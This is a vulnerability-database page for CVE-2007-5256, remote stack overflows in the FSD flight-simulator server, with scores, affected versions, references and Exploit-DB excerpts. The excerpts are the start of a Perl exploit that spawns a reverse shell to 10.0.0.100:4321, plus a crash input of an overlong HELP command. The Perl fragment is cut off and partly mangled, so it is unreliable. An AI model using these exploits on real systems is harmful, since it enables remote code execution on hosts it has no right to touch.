CVE-2007-5256
Published 2007-10-06
Priority: P346 (high)
CVSS 2.0: 7.5, vector AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: available
EPSS: 7.07% (93.4th percentile)
Multiple stack-based buffer overflows in FSD 2.052 d9 and earlier, and FSFDT FSD 3.000 d9 and earlier, allow (1) remote attackers to execute arbitrary code via a long HELP command on TCP port 3010 to the sysuser::exechelp function in sysuser.cc and (2) remote authenticated users to execute arbitrary code via long commands on TCP port 6809 to the servinterface::sendmulticast function in servinterface.cc, as demonstrated by a PIcallsign command.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mcdu | fsd | — | — |
| mcdu | fsd | — | — |
No detection rules found.
Exploit-DB: FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow (exploitdb, 2007-10-04)
---
```perl
# ~$ nc -l -p 4321
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# E:\draft\fsd1110\windows>_
#
# -------------------------------------------
#!/usr/bin/perl
# FSFDT remote exploit by weak[at]fraglab.at
# spawns reverse shell to 10.0.0.100:4321
# tested against 'FSFDT Windows FSD Beta from FSD V3.000 draft 9' on win2k sp4
use IO::Socket;
if( $#ARGV ";
exit();
}
my $ip = $ARGV[0];
my $port = $ARGV[1];
print "connecting...\n";
my $sock = new IO::Socket::INET ( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp', );
die "could not create socket: $!\n" unless $sock;
# jmp esp in KERNEL32.DLL 5.0.2195.7006
my $jmpesp = "\xB7\x49\xE7\x77";
# encoded 'jmp 0x400' to jump to stage2
my $jmpcode =
"
```
Exploit-DB: FSD 2.052/3.000 - 'sysuser.cc sysuser::exechelp' 'HELP' Remote Overflow (exploitdb, 2007-10-01)
---
source: https://www.securityfocus.com/bid/25883/info
FSD is prone to multiple remote buffer-overflow vulnerabilities because the application fails to perform adequate boundary-checks on user-supplied data.
An attacker can exploit these issues to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
These issues affect FSD 2.052 d9 and 3.0000 d9; other versions may also be affected.
Exploit-DB: FSD 2.052/3.000 - 'servinterface.cc servinterface::sendmulticast' 'PIcallsign' Command Remote Overflow (exploitdb, 2007-10-01)
---
source: https://www.securityfocus.com/bid/25883/info
A]
connect with nc or telnet to port 3010 (sometimes it can be 3011, but
it's easy to recognize since it shows a "FSD>" prompt) and then send:
HELP aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...(more_than_100_'a's)...aaaa
No writeups or analysis indexed.
References:
- http://aluigi.altervista.org/adv/fsdbof-adv.txt
- http://secunia.com/advisories/27008
- http://secunia.com/advisories/27045
- http://securityreason.com/securityalert/3195
- http://www.securityfocus.com/archive/1/481221/100/0/threaded
- http://www.securityfocus.com/archive/1/481495/100/0/threaded
- http://www.securityfocus.com/bid/25883
- http://www.vupen.com/english/advisories/2007/3334
- https://www.exploit-db.com/exploits/4484